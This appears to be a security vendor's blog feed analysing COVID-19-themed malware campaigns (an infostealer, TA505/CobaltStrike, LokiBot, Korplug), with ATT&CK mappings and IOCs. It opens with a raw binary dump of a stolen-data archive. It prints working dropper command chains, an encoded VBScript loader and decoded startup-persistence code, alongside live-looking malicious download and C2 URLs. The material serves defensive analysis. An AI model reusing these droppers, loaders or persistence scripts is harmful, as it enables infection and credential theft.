Ýsµø^dp§öì?à[y_´BÜ¥pèú+\`#º?"¶Ûܕ‚»^tê¼J¾„ë¼$$^âÆ„ùÑúSªZÿÛÃIt½U «-DÄ»ÂëN×CeàRôJŽmüQô6ƒ7?ç]uÈàÙgoŠ×»;aDã”Ôß g»œ€Ý( ÔÂð0Óùûoà8èNô“kv™/3ðÃćå-8QLí9ô¢~clªN˜¤›áÜjðXBŸcë‡e*û¶á/8´“¬D³øNÐr\Õ¼«áó<‡yÇÛƒ¬zÈkÞbσýî±ßÕÞXæmÛg€eòZ?È«N?pƒ–åµè`ZÀr· Ç eh?Jc:y#ÏÞ`zÊ"L6ò$þ‡EíJ<ßû5yµÎ׋ÿG]ÿšZŠGl×–\¡;TJr–X¸tʆBâ‡62Ã¥û"›†CÑH¡øÄÇ’à\NK™k½o‡N81^›øqŒ?¥ß㻶æFÀ{Ñ´—b…€Ä–ñŸ8$WFÊÀA=$Åõõ‚7<Œ~¥`:CÉ){Å—úÛYâLvâQ?CdÓ=pž“„rw› zç³ì•6¢åõ»wx æ>HÈCFLÂá#

äè"â…¨ÓÄ‹ƒÄBŸî–;Ø¢7€­Ãv ’èâü#ž /~OcÔ[KÑÍÓK+® a©½KmÆçûŽ¢–ÚËà°#‘…pÛʼ„DôªsbÇÑs׶çPK   @µxP"Ñ´: Ý - browsers/cookies/Firefox_qldyz51w.default.txtUT ¸Œz^¸Œz^¸Œz^ŽKKÃ@…×SèOÉ8÷Î+³¬ +¥kJ6aæ! mb¬¿ÞTqQ·ç¾óÃ@ëæ£:,mŽyÜìîÈa¤RKÁûèÔõ.²]w¬\ßUÍkä›ðL<ðõò°Úβs¼mÝü½|¨Í9=§]šlڐ0³˜Ë7WïÚûzYºými“Я¶eïøºðøÄÛôÅ¡di"Ù¯|Mét2ü×ñTEŽÌƒ6€RI ïœdB-sÈc<÷cû€ ¬³Ì;.rã¬E¦¬ÌÍtrå[¡–

Øø–Ìg@‘êXĨ‘^ÔDl˜`W?òYQ…o‚.F€$\æK¡Ëv³ˆ+ Å" 0|PK   @µxPöÎj=o ª         € passwords.txtUT ¸Œz^PK   @µxPáü÷·         €« browsers/firefox_urls.txtUT ¸Œz^PK   *µxPv P% ,         €ª browsers/chrome_autofill.txtUT ±Œz^PK   JµxP›ÌGMN |         € mails/outlook.txtUT ½Œz^PK   JµxPžt¶f L         €¨ System Info.txtUT ½Œz^PK   @µxP"Ñ´: Ý -         € browsers/cookies/Firefox_qldyz51w.default.txtUT ¸Œz^PK      Ù n    

--Jfbvjwj3489078yuyetu--


We can clearly see the PK header and some files such as passwords.txt and System Info.exe in the archive.


MITRE ATT&CK™ Mapping

Technique

Tactic

Description

T1106 - Execution through API

Execution

chrom.exe - Application launched itself

T1064 - Scripting

Defense Evasion

Execution

cmd.exe -Executes scripts

T1204 - User Execution

Execution

cmd.exe - Manual execution by user

T1129 - Execution through Module Load

Execution

svhost.exe - Loads dropped or rewritten executable

T1081 - Credentials in Files

Credential Access

svhost.exe - Actions looks like stealing of personal data svhost.exe - Stealing of credential data

T1003 - Credential Dumping

Collection

svhost.exe - reads Reads the cookies of Mozilla Firefox and Reads the cookies of Google Chrome

T1012 - Query Registry

Discovery

svhost.exe - Searches for installed software and Reads Internet Cache Settings

T1114 - Email Collection

Collection

svhost.exe - Stealing of credential data

T1105 - Remote File Copy

Command And Control

Lateral Movement

svchost.exe - download and uploads files from remote machine

T1071 - Standard Application Layer Protocol

Command And Control

svchost.exe communicate over port 80 and 443

T1032 - Standard Cryptographic Protocol

Command And Control

svchost.exe - uses standard SSL cryptography

T1217- Browser Bookmark Discovery

Discovery

svchost.exe - Reads sensitive browser data


Indicators of Compromise (IOCs)

Type

Value

URL

https://dcis.hhs.gov/cas/login?service=http%3A%2F%2F195.130.73.229/php/hhs/&gateway=true

IP

172.217.16.141

IP

2.21.38.54

IP

152.199.21.175

IP

185.62.188.204

IP

212.82.100.176

URL

http://195.130.73.229/php/hhs/document.zip

URL

http://195.130.73.229/php/hhs/

URL

http://185.62.188.204/hunt/post/corona.exe

HASH

41A857F3EA7ECBEEEF165F6EAC07606DCD8DFE12821CF4012029025496787129

HASH

2414E2FD46A354CCDCF2ADEB6FCB838ED5A47B11572571E2E35E4613FE5B2A88

HASH

DF41D7733025128357571FC1C1166F696E83E06EEB39CE6C828031B1994DB957

HASH

417871EE18A4C782DF7AE9B7A64CA060547F7C88A4A405B2FA2487940EAA3C31

TA505 Leverages the Crisis to Drop CobaltStrike

Mar. 24, 2020

Cyberint Research recently discovered an activity we attributed to TA505 using the recent COVID-19 global pandemic.  TA505 uses macro-enabled excel documents to drop CobaltStrike beacon onto the victim machine.

File name: COVID-19-FAQ.xls

SHA256: 13ec756ae8468f693cdd7e591108cbc0981ce11fe0e251cd7b9fb6c2db8fe34b

File Size: 948736 bytes

Tags: Excel, Macro-Enabled, Maldoc

File name: reinforce.dll

SHA256: 4178496e803a5651beabbb5736857d03293065b1d1e4dfeec4508960ff582f53

File Size: 293376 bytes

Tags: Beacon, CobaltStrike

COVID-19-FAQ.xls file contains an embedded OLE object. This object contains a DLL file and is extracted  and saved under:

%AppData%\Roaming\Microsoft\Windows\Templates\reinforce.dll

DLL is a custom packed loader that loads the CobaltStrike Beacon using

VirtualAlloc 

VirtualProtect

API calls to allocate memory within the loader memory space and loads the beacon payload to memory.

The beacon then communicates with its C2 using the following URLs

https://dysoool.com/casemd

http://dysoool.com/casemd

C2 was down at the time of analysis.

MITRE ATT&CK™ Mapping

Technique

Tactic

Description

T1129 - Execution through Module Load

Execution

Excel.exe - Loads dropped or rewritten executable

T1204 - User Execution

Execution

User Interactively Opens COVID-19-FAQ.xls

T1012 - Query Registry

Discovery

Excel.exe - Reads Microsoft Office registry keys

T1106 - Execution through API

Execution

reinforce.dll - allocate and loads code to memory using VirtualAlloc and VitrualProtect

T1129 - Execution through Module Load

Execution

Excel.exe - drops reinforce.dll to disk and loads it to memory

LokiBot using COVID-19 thematic lures

Mar. 23, 2020

The well utilized and documented LokiBot, also known as Loki, Loki Password Stealer and LokiPWS, is a commodity information stealer threat that has previously been sold on various underground forums and marketplaces as well as having it's code leaked in the past. Given the availability of LokiBot, many lower-sophistication threat actors use it in widespread indiscriminate campaigns and it is therefore unsurprising that recent campaigns are using COVID-19 thematic lures.

 

Cyberint's Threat Intelligence Suite recently detected a new malicious email campaign (Figure 1) attempting to masquerade as being sent from a government health authority, the seemingly fictitious 'Center for Disease Control & Management' rather than perhaps the US Centers for Disease Control and Prevention (CDC).

image1_COVIDblog

Figure 1 - Recent LokiBot email lure

Sent to organizations in at least Germany and Romania, including a pharmaceutical company, the campaign includes a malicious Zip compressed attachment that drops the LokiBot stealer onto the victim's machine.

As is the de rigueur for email lures of this nature, the message implies a sense of urgency and importance to the recipient, encouraging the attachment to be opened to view content reportedly from the World Health Organization (WHO) related to the COVID-19 situation.

As seen in other recent campaigns, whilst the file attachment has an 'arj' file extension, typically assigned to files compressed using the ARJ archiver, the file is a Zip compressed archives as confirmed by the file header (Figure 2).

image2_COVIDblog

Figure 2 - Attachment 'Zip' file header

The use of a file extension that does not correspond to the actual file type may be an attempt to avoid low-sophistication countermeasures such as restrictions based on file extension alone. Furthermore, whilst Windows does not natively ARJ compressed files, common compression applications such as 7zip, WinRAR and WinZIP often process archives based on their file header, regardless of the file extension, and would therefore decompress the file if it were opened.

Initial Payload

Once decompressed, the archive contains a compiled AutoIt script named 'AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe' that mimics an Adobe PDF file to encourage the recipient to open it.

Decompiling the AutoIt payload reveals a script that appears to have used obfuscation techniques (Figure 3) to mask its operations including the use of randomly named variables, a string reversal function and the built in 'BinaryToString' function.

image3_COVIDblog

Figure 3 - Decompiled AutoIt Script with obfuscation

LokiBot Payload

Encoded and also stored in reverse, a shellcode payload is present within the compiled AutoIt script (Figure 4) ready for injection into another process.

image4_COVIDblog

Figure 4 - Shellcode Payload

In this instance, the code is injected into the Windows 'COM Surrogate' process, 'dllhost.exe', and calls home to the LokiBot command and control (C2) server.

Command and Control

As is often the case with LokiBot, and other 'stealer' malware, the command and control (C2) infrastructure is installed on a compromised webserver.

Commencing with a 'call home' operation, the LokiBot payload sends a HTTP POST to the common LokiBot page 'fre.php' along with details of the compromised host such as user and device information (Figure 5).

image5_COVIDblog

 

Figure 5 - Call home 'HTTP POST'

Aside from compromised hosts communicating with the common C2 page 'fre.php', the seemingly fixed user-agent string 'Mozilla/4.08 (Charon; Inferno)' may serve as a useful indicator of compromise when reviewing network access logs.

Analysis of this compromised host confirms the presence of a LokiBot control panel and administrative interface accessible via the page '/PvqDq929BSx_A_D_M1n_a.php' (Figure 6).

image6_COVIDblog

Figure 6 - LokiBot Admin Interface

Password Stealer

Consistent with other versions of LokiBot, this campaign attempts to access credential-related data for a number of file transfer clients, email clients and web browsers including.

MITRE ATT&CK™ Mapping


Technique

Tactic

Description

T1033 - System Owner/User Discovery

Discovery

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system.

T1041 - Exfiltration Over Command and Control Channel

Exfiltration

Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.

T1055 - Process Injection

Defense EvasionPrivilege Escalation

Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

T1081 - Credentials in Files

Credential Access

Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

T1082 - System Information Discovery

Discovery

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

T1193 - Spearphishing Attachment

Initial Access

Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.

T1204 - User Execution

Execution

An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via Spearphishing Attachment with the icon and apparent extension of a document file.

T1071 - Standard Application Layer Protocol

Command & Control

Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Indicators of Compromise (IOC)

Filename

MD5

SHA1

SHA256

AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_zip.arj

bac2f22d53c6f2b43eba6adbb0f2ea9a

2073403dc04dd90140135e0cce1b504d5fcc6876

f7b0d6d95f2644e32c22eb3e681e33387ac27d71dd73eee3ff37ce77985ab177

AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe

9498ba71b33e9e9e19c352579e0d1b0a

39419cf0c4a2aec86db7e87aaecf2972ed7cddb6

da26ba1e13ce4702bd5154789ce1a699ba206c12021d9823380febd795f5b002

Command & Control

  • hxxp://academydea[.]com/alhaji/Panel/five/fre.php - Call home
  • hxxp://academydea[.]com/alhaji/Panel/five/PvqDq929BSx_A_D_M1n_a.php - Admin interface

At the time of analysis, 'academydea[.]com' resolved to '165.227.16[.]98'


 

Korplug Malware Spread Leveraging the WHO Lure

Mar. 23, 2020

Cyberint Research detected a suspicious .zip file called  covid.zip submitted to a public AV scanner  from China.

File name: covid.zip

SHA256: 0977aebba030684c623612741999865932f9aff7e9ea8111b7323154c2f03f0f

File Size: 872725 bytes

Tags: Archive

The file contains an .lnk file masked as PDF called covid.pdf.lnk (NB! the .lnk extension will not be visible when viewing the file via windows explorer).

File name: covid.pdf.lnk

SHA256: 95489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8

File Size: 1160121 bytes

Tags: Dropper, lnk 

The file size is suspicious as it is abnormal to have large .lnk files - usually small in size. When analyzing the content of the lnk file, following script can be seen:

Windows

System32

cmd.exe

C:\Windows\System32\cmd.exe

%SystemRoot%\system32\cmd.exe

Windows

System32

cmd.exe

!..\..\..\Windows\System32\cmd.exe

/c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp>%tmp%\\cSi1r0uywDNvDu.tmp&%tmp%\\msoia.exe -decode %tmp%\\cSi1r0uywDNvDu.tmp %tmp%\\oGhPGUDC03tURV.tmp&expand %tmp%\\oGhPGUDC03tURV.tmp -F:* %tmp% &wscript %tmp%\\9sOXN6Ltf0afe7.js

%SystemRoot%\system32\cmd.exe

S-1-5-21-352958147-3626090895-810647513-1000

TVNDRgAAAADWPw0AAAAAAEwAAAAAAAAAAwEFAAYAAACtJwAAKgEAABsAAQAT6QsAAgABAC5lDAADAAEARvcMAAEAAQBbOA0AAQABABUTDQAAAAAAAABpUJOkIAAyMDIwMDMwOC1zaXRyZXAtNDgtY292aWQtMTkucGRmAP31AAAAAAAAAQBpUCymIABNaVpsNXhzRFJ5bGYwVy50bXAAOFUBAAAAAAACAFo1lKEgADQ4NkFVTE1zT1BtZjZXLnRtcAAAgAAAAAAAAAMAaVAlhiAAM1VEQlVUTlk3WXN0UmMudG1wABgDAAAAAAAABABpUFCmIAA5c09YTjZMdGYwYWZlNy5qcwDFEwAAGAMAAAQAaVBQpiAAY1NpMXIwdXl3RE52RHUudG1wAOuMvDnBcACAQ0vdvWN4Zs22NhrbNjod27bNjm3bNjq2bXaSjju2bXecdGznPP2+a+2l/e1vrevs8+c8PzLnzCyMGneNUfeoWbMmqYKIGC0jHTs8DGkj4AcPw0jEQGRnaAkPw8NDr+Jhb0IvbOBsYG1nRq9gYGbiRMQEuK1EL2Nga0ZhYkv7RZmSiF7Z2dHFyFnF0cREyc7OmYiD448ksgaOVpK2pnaAYn6fmhgTAZKZ8PHRy5o4GxgDyiRiYmNl/COpqoWJm4mjgqOJqYmjia3R71rYWP+oiI8PHsbE1vgPeZj+WbA/BKIXtnOxBVRKL21h7KRFxPw7FxEz25+HPyQhYmH988D+x4H1zys2hj8O7H8k0SH6+4qY/7uKAH8Asjn/pf1KJk52Lo4ASQFJxOxsnX8fGIn+KJlejImI888TZiLGPxsoxkLEyPznGSsRI/ufZ2xEjH9Jx07ExPLnGQcRE8ef7aYXdXcWV3Y2cDYBlC2uzE70Zy5xZQ6iv6ZQlze0NDH6XbekDUBCRkDRf0rwxyUTG0CLf7tkZiViZv1LRgVHOyNlE2ctegD29Com7s5/JhH68yD850Hyt1LoBW1t7Zx/6/UvimX5U10AEI0tDITs3LWI

 

the .lnk file acts as a dropper and drops the following files to the %temp% directory

File name: g4ZokyumBB2gDn.tmp

SHA256: 95489AF84596A21B6FCCA078ED10746A32E974A84D0DAED28CC56E77C38CC5A8

File Size: 1160121 bytes

Tags: Dropper, Ink

 

File name: msoia.exe

SHA256: 589229E2BD93100049909EDF9825DCE24FF963A0C465D969027DB34E2EB878B4

File Size: 889856 bytes

Tags: Signed, Trusted, Centucil

 

File name: cSi1r0uywDNvDu.tmp

SHA256: 9D52D8F10673518CB9F19153DDBE362ACC7CA885974A217A52D1EE8257F22CFC

File Size: 5061 bytes

Tags: COM, Embedded VBS, XML

 

The embedded script within the lnk file looks for the base64 string "TVNDRgAAAA" directed to MSCF which is a CAB header (Microsoft Compressed Archive) using the following command:

findstr.exe "TVNDRgAAAA" C:\Users\admin\AppData\Local\Temp\\g4ZokyumBB2gDn.tmp

As soon as it’s found, it calls msoia.exe - a renamed certutil.exe to decode the CAB file using the following command line

C:\Users\admin\AppData\Local\Temp\\msoia.exe -decode C:\Users\admin\AppData\Local\Temp\\cSi1r0uywDNvDu.tmp C:\Users\admin\AppData\Local\Temp\\oGhPGUDC03tURV.tmp

Following that, it extracts the CAB file under the %temp% directory using the following command

expand C:\Users\admin\AppData\Local\Temp\\oGhPGUDC03tURV.tmp -F:* C:\Users\admin\AppData\Local\Temp

The expand command extracts the following files

File name: 20200308-sitrep-48-covid-19.pdf

SHA256: 2DD886CC041EA6E5E80880CCBBC54BE42079598ACF0C1E7E459616C3F9C0DD34

File Size: 856853 bytes

Tags: Decoy, Legitimate, PDF

 

File name: 486AULMsOPmf6W.tmp

SHA256: 604679789C46A01AA320EB1390DA98B92721B7144E57EF63853C3C8F6D7EA85D'

File Size: 87352 bytes

Tags: Legitimate, Signed

 

File name: 3UDBUTNY7YstRc.tmp

SHA256: A49133ED68BEBB66412D3EB5D2B84EE71C393627906F574A29247D8699F1F38E

File Size: 32768 bytes

Tags: DLL, Korplug

 

File name: 9sOXN6Ltf0afe7.js

SHA256: 70B8397F87E4A0D235D41B00A980A8BE9743691318D30293F7AA6044284FFC9C

File Size: 792 bytes

Tags: JavaScript, Loader

 

File name: cSi1r0uywDNvDu.tmp

SHA256: 9D52D8F10673518CB9F19153DDBE362ACC7CA885974A217A52D1EE8257F22CFC

File Size: 5061 bytes

Tags: Korplug, Loader

The first file is the legitimate PDF from the World Health Organization (WHO) discussing the COVID-19 global pandemic to deflect any suspicion from the victim. In the background the loader calls wscript.exe with the following command:

wscript C:\Users\admin\AppData\Local\Temp\\9sOXN6Ltf0afe7.js

9sOXN6Ltf0afe7.js is a simple JavaScript loader that executes the following command

cmd /c mkdir %tmp%\\cscript.exe&for /r C:\\Windows\\System32\\ %m in (cscr*.exe) do copy %m %tmp%\\cscript.exe\\msproof.exe /y&move /Y %tmp%\\cSi1r0uywDNvDu.tmp %tmp%\\cscript.exe\\WsmPty.xsl&%tmp%\\cscript.exe\\msproof.exe //nologo %windir%\\System32\\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty&del \"%userprofile%\\OFFICE12\\Wordcnvpxy.exe\" /f /q&ping -n 1 127.0.0.1&move /Y %tmp%\\486AULMsOPmf6W.tmp \"%userprofile%\\OFFICE12\\MSOSTYLE.EXE\"&move /Y %tmp%\\3UDBUTNY7YstRc.tmp \"%userprofile%\\OFFICE12\\OINFO12.OCX\"&copy /b %tmp%\\2m7EBxdH3wHwBO.tmp+%tmp%\\MiZl5xsDRylf0W.tmp \"%userprofile%\\OFFICE12\\Wordcnvpxy.exe\" /Y&\"%tmp%\\20200308-sitrep-48-covid-19.pdf\"",0

The js loader creates a folder called cscript.exe under the %tmp% directory and copy cscript from the %systemroot%\System32 to the newly created directory and saves it as msproof.exe using the following command

C:\Windows\System32\cmd.exe" /c mkdir C:\Users\admin\AppData\Local\Temp\cscript.exe&for /r C:\Windows\System32\ %m in (cscr*.exe) do copy %m C:\Users\admin\AppData\Local\Temp\cscript.exe\msproof.exe

It then moves cSi1r0uywDNvDu.tmp from the %temp$ directory and saves it as WsmPty.xsl using the following command

msproof.exe /y&move /Y C:\Users\admin\AppData\Local\Temp\cSi1r0uywDNvDu.tmp C:\Users\admin\AppData\Local\Temp\cscript.exe\WsmPty.xsl

WsmPty.xsl is an encoded COM XML with VBS code which is XOR encoded

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

 <ms:script implements-prefix="user" language="VBScript">

 <![CDATA[

 rBOH7OLTCVxzkH=HrtvBsRh3gNUbe("2044696D206C466C464578466563467546744665462C6A43657A734E534A544B4D684F796D2C6A506B57746C4E69476F686D67664C7679644F2C57746C4E69534A544B4665634675460D0A206C466C46457846656346754674466546203D204372656174654F626A6563742822577363726970742E5368656C6C22292E456E7669726F6E6D656E74282250726F6365737322292E4974656D28225553455250524F46494C4522290D0A206A43657A734E534A544B4D684F796D203D204372656174654F626A6563742822577363726970742E5368656C6C22292E456E7669726F6E6D656E74282250726F6365737322292E4974656D282254454D5022290D0A2044696D20466B46694668466546616C467446684661466E642C20467769466E4664466F7773467479466C4665460D0A2053657420466B46694668466546616C467446684661466E64203D204372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422290D0A20467769466E4664466F7773467479466C466546203D206C466C4645784665634675467446654626225C4F46464943453132220D0A20496620466B46694668466546616C467446684661466E642E666F6C64657245786973747328467769466E4664466F7773467479466C46654629205468656E0D0A20456C73650D0A20466B46694668466546616C467446684661466E642E437265617465466F6C64657228467769466E4664466F7773467479466C466546290D0A20456E642049660D0A206A506B57746C4E69476F686D67664C7679644F203D206A43657A734E534A544B4D684F796D26225C326D37454278644833774877424F2E746D70220D0A206D4A645A71546D4B744C7657674A7743286A506B57746C4E69476F686D67664C7679644F29200D0A2044696D206843787269754475445A72526E756C66736D784F4D4F6D6A5565417142664E6D43524A4A5373666B6A2C5642784A446A42704F4258476977677770414F597569746A774C70594B5973776A63612C7763486D5A5A566D456E45547843554256775A5865766E4F5661650D0A20736574206843787269754475445A72526E756C66736D784F4D4F6D6A5565417142664E6D43524A4A5373666B6A3D4372656174654F626A6563742822575363726970742E5368656C6C22290D0A205642784A446A42704F4258476977677770414F597569746A774C70594B5973776A63613D6843787269754475445A72526E756C66736D784F4D4F6D6A5565417142664E6D43524A4A5373666B6A2E5370656369616C466F6C6465727328225374617274757022290D0A20736574207763486D5A5A566D456E45547843554256775A5865766E4F5661653D6843787269754475445A72526E756C66736D784F4D4F6D6A5565417142664E6D43524A4A5373666B6A2E43726561746553686F7274637574285642784A446A42704F4258476977677770414F597569746A774C70594B5973776A6361202620225C4163636573736F726965732E6C6E6B22290D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E54617267657450617468203D2022433A5C57696E646F77735C53797374656D33325C72756E646C6C33322E657865220D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E57696E646F775374796C65203D20310D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E576F726B696E674469726563746F72793D5642784A446A42704F4258476977677770414F597569746A774C70594B5973776A63610D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E417267756D656E7473203D2022433A5C57696E646F77735C73797374656D33325C75726C2E646C6C2C46696C6550726F746F636F6C48616E646C65722022266368722833342926467769466E4664466F7773467479466C46654626225C4D534F5354594C452E6578652226636872283334290D0A207763486D5A5A566D456E45547843554256775A5865766E4F5661652E536176650D0A2057746C4E69534A544B466563467546203D20467769466E4664466F7773467479466C46654626225C5C4D534F5354594C452E657865220D0A2046756E6374696F6E206D4A645A71546D4B744C7657674A77432846696C654E616D65290D0A202020202044696D206D49714C7A497242635A69466A5661492C206D496A467A527751734B7752634176412C206D48705863426F436E4E744C755764500D0A2020202020536574206D496A467A527751734B775263417641203D204372656174654F626A65637428224D6963726F736F66742E584D4C444F4D22290D0A2020202020536574206D48705863426F436E4E744C75576450203D206D496A467A527751734B7752634176412E437265617465456C656D656E74282262696E61727922290D0A2020202020536574206D49714C7A497242635A69466A566149203D204372656174654F626A656374282241444F44422E53747265616D22290D0A20202020206D48705863426F436E4E744C755764502E4461746154797065203D202262696E2E686578220D0A20202020206D48705863426F436E4E744C755764502E54657874203D2022344435413930220D0A20202020206D49714C7A497242635A69466A5661492E54797065203D20310D0A20202020206D49714C7A497242635A69466A5661492E4F70656E0D0A20202020206D49714C7A497242635A69466A5661492E5772697465206D48705863426F436E4E744C755764502E4E6F6465547970656456616C75650D0A20202020206D49714C7A497242635A69466A5661492E53617665546F46696C652046696C654E616D652C20320D0A20202020206D49714C7A497242635A69466A5661492E436C6F73650D0A2020202020536574206D49714C7A497242635A69466A566149203D204E6F7468696E670D0A2020202020536574206D48705863426F436E4E744C75576450203D204E6F7468696E670D0A2020202020536574206D496A467A527751734B775263417641203D204E6F7468696E670D0A20456E642046756E6374696F6E"):execute(rBOH7OLTCVxzkH):function HrtvBsRh3gNUbe(bhhz6HalbOkrki):for rBOH7OLTCVxzkH=1 to len(bhhz6HalbOkrki)step 2:HrtvBsRh3gNUbe=HrtvBsRh3gNUbe&chr(asc(chr("&h"&mid(bhhz6HalbOkrki,rBOH7OLTCVxzkH,2)))xor 0):next:end function:

 ]]> </ms:script>

</stylesheet>

Once decoded, it clearly shows the script creating a persistence mechanism

Dim lFlFExFecFuFtFeF,jCezsNSJTKMhOym,jPkWtlNiGohmgfLvydO,WtlNiSJTKFecFuF

 lFlFExFecFuFtFeF = CreateObject("Wscript.Shell").Environment("Process").Item("USERPROFILE")

 jCezsNSJTKMhOym = CreateObject("Wscript.Shell").Environment("Process").Item("TEMP")

 Dim FkFiFhFeFalFtFhFaFnd, FwiFnFdFowsFtyFlFeF

 Set FkFiFhFeFalFtFhFaFnd = CreateObject("Scripting.FileSystemObject")

 FwiFnFdFowsFtyFlFeF = lFlFExFecFuFtFeF&"\OFFICE12"

 If FkFiFhFeFalFtFhFaFnd.folderExists(FwiFnFdFowsFtyFlFeF) Then

 Else

 FkFiFhFeFalFtFhFaFnd.CreateFolder(FwiFnFdFowsFtyFlFeF)

 End If

 jPkWtlNiGohmgfLvydO = jCezsNSJTKMhOym&"\2m7EBxdH3wHwBO.tmp"

 mJdZqTmKtLvWgJwC(jPkWtlNiGohmgfLvydO) 

 Dim hCxriuDuDZrRnulfsmxOMOmjUeAqBfNmCRJJSsfkj,VBxJDjBpOBXGiwgwpAOYuitjwLpYKYswjca,wcHmZZVmEnETxCUBVwZXevnOVae

 set hCxriuDuDZrRnulfsmxOMOmjUeAqBfNmCRJJSsfkj=CreateObject("WScript.Shell")

 VBxJDjBpOBXGiwgwpAOYuitjwLpYKYswjca=hCxriuDuDZrRnulfsmxOMOmjUeAqBfNmCRJJSsfkj.SpecialFolders("Startup")

 set wcHmZZVmEnETxCUBVwZXevnOVae=hCxriuDuDZrRnulfsmxOMOmjUeAqBfNmCRJJSsfkj.CreateShortcut(VBxJDjBpOBXGiwgwpAOYuitjwLpYKYswjca & "\Accessories.lnk")

 wcHmZZVmEnETxCUBVwZXevnOVae.TargetPath = "C:\Windows\System32\rundll32.exe"

 wcHmZZVmEnETxCUBVwZXevnOVae.WindowStyle = 1

 wcHmZZVmEnETxCUBVwZXevnOVae.WorkingDirectory=VBxJDjBpOBXGiwgwpAOYuitjwLpYKYswjca

 wcHmZZVmEnETxCUBVwZXevnOVae.Arguments = "C:\Windows\system32\url.dll,FileProtocolHandler "&chr(34)&FwiFnFdFowsFtyFlFeF&"\MSOSTYLE.exe"&chr(34)

 wcHmZZVmEnETxCUBVwZXevnOVae.Save

 WtlNiSJTKFecFuF = FwiFnFdFowsFtyFlFeF&"\\MSOSTYLE.exe"

 Function mJdZqTmKtLvWgJwC(FileName)

     Dim mIqLzIrBcZiFjVaI, mIjFzRwQsKwRcAvA, mHpXcBoCnNtLuWdP

     Set mIjFzRwQsKwRcAvA = CreateObject("Microsoft.XMLDOM")

     Set mHpXcBoCnNtLuWdP = mIjFzRwQsKwRcAvA.CreateElement("binary")

     Set mIqLzIrBcZiFjVaI = CreateObject("ADODB.Stream")

     mHpXcBoCnNtLuWdP.DataType = "bin.hex"

     mHpXcBoCnNtLuWdP.Text = "4D5A90"

     mIqLzIrBcZiFjVaI.Type = 1

     mIqLzIrBcZiFjVaI.Open

     mIqLzIrBcZiFjVaI.Write mHpXcBoCnNtLuWdP.NodeTypedValue

     mIqLzIrBcZiFjVaI.SaveToFile FileName, 2

     mIqLzIrBcZiFjVaI.Close

     Set mIqLzIrBcZiFjVaI = Nothing

     Set mHpXcBoCnNtLuWdP = Nothing

     Set mIjFzRwQsKwRcAvA = Nothing

 End Function

VBS script creates persistence using an .lnk file called Accessories.lnk under the startup directory.

It launches rundell32.exe that loads MSOSTYLE.EXE (an old Microsoft Office WBEM component using search order) hijacking it and loads OINFO12.OCX which is the KorePlug DLL component.

Once completed, it launches winrm.vbs (a legitimate vbs script responsible for interacting with Windows Remote Management) using the following command

msproof.exe //nologo C:\Windows\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty

When Windows Remote Management is running on the local machine, the command will return an XML schema of the basic machine information like the operating system version and more.

The loader then deletes C:\Users\admin\OFFICE12\Wordcnvpxy.exe and executes ping.exe with one ICMP packet to 127.0.0.1. It then moves 486AULMsOPmf6W.tmp and 3UDBUTNY7YstRc.tmp from the %temp% directory to OFFICE12\ using the following command:

move /Y C:\Users\admin\AppData\Local\Temp\486AULMsOPmf6W.tmp "C:\Users\admin\OFFICE12\MSOSTYLE.EXE"&move /Y C:\Users\admin\AppData\Local\Temp\3UDBUTNY7YstRc.tmp "C:\Users\admin\OFFICE12\OINFO12.OCX"

MSOSTYLE.EXE is a legitimate file part of the Microsoft office package, OINFO12.OCX is the KorPlug DLL. The loader then copies 2m7EBxdH3wHwBO.tmp and MiZl5xsDRylf0W.tmp using the following command

copy /b C:\Users\admin\AppData\Local\Temp\2m7EBxdH3wHwBO.tmp+C:\Users\admin\AppData\Local\Temp\MiZl5xsDRylf0W.tmp "C:\Users\admin\OFFICE12\Wordcnvpxy.exe" /Y&"C:\Users\admin\AppData\Local\Temp\20200308-sitrep-48-covid-19.pdf"

A persistence mechanism is then set by dropping an lnk file called Accessories.lnk under the Startup directory that points to MSOSTYLE.EXE, the loader then launches the decoy PDF.

The Korplug payload is executed on a system reboots and the user logins to the system by running the     Acceptable.lnk described earlier.

Korplug then communicates with its C2 hxxp://motivation[.]neighboring[.]site/01/index.php which was down at the time of analysis.

 

MITRE ATT&CK™ Mapping

  • T1059 - Command-Line Interface (Execution)
  • T1106 - Execution through API (Execution)
  • T1129 - Execution through Module Load (Execution)
